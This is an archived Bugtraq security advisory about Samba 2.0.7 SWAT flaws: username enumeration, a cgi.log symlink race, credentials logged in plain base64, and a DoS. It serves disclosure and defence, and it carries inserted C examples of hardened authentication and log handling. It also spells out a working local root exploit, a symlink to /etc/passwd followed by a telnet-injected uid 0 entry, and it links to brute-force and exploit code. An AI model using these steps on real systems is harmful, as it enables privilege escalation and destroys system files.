5659539 2000-10-30 09:27 -0800  /109 lines/ Optyx - Uberhax0r Communications <optyx@UBERHAX0R.NET>
Sent by: joel@lysator.liu.se
Imported: 2000-10-31  01:05  by Brevbäraren (which is implemented in) Python
External recipient: BUGTRAQ@SECURITYFOCUS.COM
External replies to: optyx@UBERHAX0R.NET
Recipient: Bugtraq (import) <13512>
Extra copy: Samba -- free implementation of SMB <808>
    Sent:     2000-10-31 01:09
    Sent by Mathias Hansson (food for thoughtlessness)
Subject: Samba 2.0.7 SWAT vulnerabilities
------------------------------------------------------------
From: Optyx - Uberhax0r Communications <optyx@UBERHAX0R.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <Pine.SOL.4.21.0010300920500.3477-100000@d33r>

******************************************************************************
the original writeup can be found at
http://www.uberhax0r.net/~miah/swat along with all the code mentioned
in this advisory
******************************************************************************

The program swat included in the samba distribution allows username
and password brute-forcing. An attacker can easily generate user lists
and then brute-force their passwords. Comments in the source code show
that somebody tried to prevent this from happening[1].

The problem occurs when a user types in the wrong password. If swat
gets a valid username but an incorrect password, it errors with:

2-second pause

401 Authorization Required

You must be authenticated to use this service.

If swat gets an invalid username/password:

NO PAUSE

401 Bad Authorization

username/password must be supplied

The following code is written by t12. It will generate a list of
valid usernames and then brute-force passwords for those
usernames. It has been tested on FreeBSD.

http://www.uberhax0r.net/~miah/swat/code/flyswatter.c

Obviously, if the username/password are correct you get logged in.
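The two failure paths above are the whole problem: the message and the pause differ depending on whether the username exists, so a client can tell real accounts from nonexistent ones without ever guessing a password. The following C is an added example, not code from this advisory or from Samba, showing the leaky pattern beside a uniform one. The account table, the names `leaky_response`, `uniform_response` and `equal_fixed_time`, and the delay value carried in the response are constructed for the illustration; a real implementation would also run the same password-hash check (for instance crypt()) on the dummy path so that the work done, and therefore the time taken, is the same in both cases.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Constructed stand-in for the system account database (example data only). */
struct account { const char *name; const char *password; };
static const struct account accounts[] = {
    { "root",  "correct horse" },
    { "admin", "battery staple" },
};

/* One outcome as the client sees it: status code, body text and the pause
 * the server applies before answering (the advisory's 2-second pause). */
struct response { int status; const char *message; int delay_ms; };

static const struct account *find_account(const char *user)
{
    size_t i;
    for (i = 0; i < sizeof accounts / sizeof accounts[0]; i++)
        if (strcmp(accounts[i].name, user) == 0)
            return &accounts[i];
    return NULL;
}

/* The behaviour the advisory describes: an unknown user gets an instant
 * "Bad Authorization", a known user with the wrong password gets a delayed
 * "Authorization Required". The difference is a username oracle. */
static struct response leaky_response(const char *user, const char *pass)
{
    const struct account *a = find_account(user);
    if (a == NULL)
        return (struct response){ 401, "Bad Authorization", 0 };
    if (strcmp(a->password, pass) != 0)
        return (struct response){ 401, "Authorization Required", 2000 };
    return (struct response){ 200, "OK", 0 };
}

/* Compare two strings without stopping at the first mismatch, so the time
 * taken does not reveal how much of the secret was right. */
static int equal_fixed_time(const char *a, const char *b)
{
    size_t la = strlen(a), lb = strlen(b), n = la > lb ? la : lb, i;
    unsigned char diff = (unsigned char)(la != lb);
    for (i = 0; i < n; i++)
        diff |= (unsigned char)((i < la ? a[i] : 0) ^ (i < lb ? b[i] : 0));
    return diff == 0;
}

/* Hardened: a single failure path. The password check always runs (against
 * a dummy entry when the user is unknown, so the same work is done), and
 * every failure gets the same status, the same text and the same delay. */
static struct response uniform_response(const char *user, const char *pass)
{
    static const struct account dummy = { "", "dummy-entry-never-matches" };
    const struct account *a = find_account(user);
    int exists = (a != NULL);
    int match;
    if (!exists)
        a = &dummy;
    match = equal_fixed_time(a->password, pass);
    if (exists && match)
        return (struct response){ 200, "OK", 0 };
    return (struct response){ 401, "Authorization Required", 2000 };
}

/* True when two outcomes are indistinguishable to the client. */
static int responses_identical(struct response x, struct response y)
{
    return x.status == y.status && x.delay_ms == y.delay_ms
        && strcmp(x.message, y.message) == 0;
}

int main(void)
{
    struct response l1 = leaky_response("nobody", "guess");
    struct response l2 = leaky_response("root", "guess");
    struct response u1 = uniform_response("nobody", "guess");
    struct response u2 = uniform_response("root", "guess");
    printf("leaky:   unknown vs known user distinguishable = %d\n",
           !responses_identical(l1, l2));
    printf("uniform: unknown vs known user distinguishable = %d\n",
           !responses_identical(u1, u2));
    return 0;
}
```

The caller is expected to sleep for `delay_ms` before writing the response; what matters for the fix is that the value, like the message, is chosen before the code knows whether the username was real.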

What makes this even worse is that swat does no logging. However, if
logging[2] is enabled, a temp-file race exists. Swat does not check
whether the file already exists beforehand and overwrites it without
regret. What makes this even worse is that swat will log *any* input it
gets into this log file. So, for example, if we have a local shell on a
system running swat but want root, we simply:

ln -s /tmp/cgi.log /etc/passwd

telnet localhost 901
--enter the following--
rootuser::0:0::/:/bin/bash
--hang up the connection--

We now have the following entry in our /etc/passwd file: [Date: Mon,
23 Oct 2000 16:03:13 GMT localhost.localdomain (127.0.0.1)]
rootuser::0:0::/:/bin/bash

You could also use this shell script
http://www.uberhax0r.net/~miah/swat/code/swat-exp.sh or, if you want
it in C, http://www.uberhax0r.net/~miah/swat/code/swat-exp.c, also
precompiled for Linux at
http://www.uberhax0r.net/~miah/swat/code/swat-exp.linux (code by
optyx).

You can also download a fixed cgi.c
http://www.uberhax0r.net/~miah/swat/code/cgi.c.fixed (make your own
damned diff) (fix by optyx)

You can now su to that user. *NOTE* this will destroy the passwd
file. Now you might be thinking "but if /tmp/cgi.log exists, how
can a user overwrite it with a symlink?". The answer: why bother! The
cgi.log file contains everything the user's web browser sent to swat,
including their login/password.

The Authorization: Basic entries have username:password encoded in
base64 in them. Most of the time the swat administrator will log in as
root to make changes to smb.conf, so getting root is easy. You
can run the gimme-login.sh script to get a list of logins from the
cgi.log.
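Both log-file problems described above, the predictable /tmp/cgi.log that is opened without checking what already sits at that path, and the logging of raw Authorization: headers, are fixable at the two points where the daemon touches the log: the open() call and the write of each line. The following C is an added example, not the advisory's code and not Samba's cgi.c: `open_log_unsafe` reproduces the open pattern the text describes, `open_log_safe` shows the flags that make a planted symlink fail, and `redact_header` drops the credential before a line is logged. The scratch directory, the decoy file and the sample request lines are constructed for the demonstration, and the demo cleans up after itself.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <strings.h>
#include <sys/stat.h>
#include <unistd.h>

/* The pattern the advisory describes: a fixed name in a world-writable
 * directory, created or truncated with no exclusivity check, so whatever a
 * planted symlink points at is what really gets truncated and written. */
static int open_log_unsafe(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
}

/* Hardened open. O_CREAT|O_EXCL fails with EEXIST if anything, a symlink
 * included, already sits at the path; O_NOFOLLOW independently refuses a
 * final-component symlink (ELOOP); mode 0600 keeps the contents private.
 * A real daemon should also put the file in a directory only it can write. */
static int open_log_safe(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Copy one request header line into out, replacing the value of an
 * Authorization header with a marker so the base64 user:password the
 * advisory warns about never reaches the log. Returns 1 if redacted. */
static int redact_header(const char *line, char *out, size_t outlen)
{
    static const char prefix[] = "Authorization:";
    if (strncasecmp(line, prefix, sizeof prefix - 1) == 0) {
        snprintf(out, outlen, "%s [redacted]", prefix);
        return 1;
    }
    snprintf(out, outlen, "%s", line);
    return 0;
}

/* Runs the redaction over a constructed request; returns 1 when the
 * credential is gone and every other line is logged verbatim. */
static int demo_redaction(void)
{
    static const char *request[] = {        /* constructed sample request */
        "GET / HTTP/1.0",
        "Host: localhost:901",
        "Authorization: Basic dXNlcjpwYXNz",  /* "user:pass" in base64 */
        "User-Agent: example-browser",
    };
    char out[256];
    size_t i;
    int redacted = 0;
    for (i = 0; i < sizeof request / sizeof request[0]; i++) {
        int r = redact_header(request[i], out, sizeof out);
        if (strstr(out, "dXNlcjpwYXNz") != NULL)
            return 0;                        /* credential leaked */
        if (!r && strcmp(out, request[i]) != 0)
            return 0;                        /* harmless line altered */
        redacted += r;
    }
    return redacted == 1;
}

/* Plants a symlink named cgi.log at a decoy file inside a scratch directory
 * and checks that the naive open follows it (truncating the decoy) while the
 * hardened open refuses. Returns 1 when exactly that is observed. */
static int demo_symlink_race(void)
{
    char dir[64], decoy[128], link_path[128];
    struct stat st;
    int fd, followed = 0, truncated = 0, refused = 0;

    snprintf(dir, sizeof dir, "./swat_log_demo_%ld", (long)getpid());
    if (mkdir(dir, 0700) != 0) {             /* fall back to /tmp */
        snprintf(dir, sizeof dir, "/tmp/swat_log_demo_%ld", (long)getpid());
        if (mkdir(dir, 0700) != 0)
            return 0;
    }
    snprintf(decoy, sizeof decoy, "%s/passwd", dir);
    snprintf(link_path, sizeof link_path, "%s/cgi.log", dir);

    fd = open(decoy, O_WRONLY | O_CREAT | O_TRUNC, 0600);
    if (fd < 0 || write(fd, "decoy contents\n", 15) != 15 || close(fd) != 0)
        goto cleanup;
    if (symlink("passwd", link_path) != 0)   /* target relative to dir */
        goto cleanup;

    fd = open_log_unsafe(link_path);
    followed = (fd >= 0);
    if (fd >= 0)
        close(fd);
    truncated = (stat(decoy, &st) == 0 && st.st_size == 0);

    fd = open_log_safe(link_path);
    refused = (fd < 0 && (errno == EEXIST || errno == ELOOP));
    if (fd >= 0)
        close(fd);

cleanup:
    unlink(link_path);
    unlink(decoy);
    rmdir(dir);
    return followed && truncated && refused;
}

int main(void)
{
    printf("naive open followed link, hardened open refused: %d\n",
           demo_symlink_race());
    printf("credentials redacted before logging: %d\n", demo_redaction());
    return 0;
}
```

O_EXCL alone already defeats the symlink, since POSIX requires open() to fail with EEXIST when O_CREAT|O_EXCL is given and the path is a symbolic link, whatever it points to; O_NOFOLLOW is belt and braces for code paths that later reopen an existing log.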

Swat is also vulnerable to a DoS attack. Anybody can perform
this. Simply log in to swat with an improper username and password, but
change the default URL from "hostname:901" to something like
"hostname:901?somerandomfile". Swat will error with "Authentication
Required" (even with valid accounts) and inetd will restart it. Using
Netscape, the browser will retry to get the file and will eventually
cause the inetd daemon to shut down swat for 10 minutes (dependent on
inetd configuration; this was tested on Red Hat Linux 6.2).

[1] In the cgi.c file the following entry exists:
Line 349/367
/*
 * Always give the same error so a cracker
 * cannot tell why we fail.
 */

The person that wrote this code obviously didn't check their work too
well.

[2] Logging is enabled by changing samba-2.0.7/source/web/cgi.c's
"#define CGI_LOGGING 0" to "#define CGI_LOGGING 1". Some systems may
have this by default; otherwise it's a tweak the sysadmin will most
likely have to do.

Credit to miah for discovering everything and to t12 and optyx for the
code.

*****************************************************************************
Uberhax0r Communications, putting bullets in mullets since '96
(5659539) --------------------------------(Rewrapped)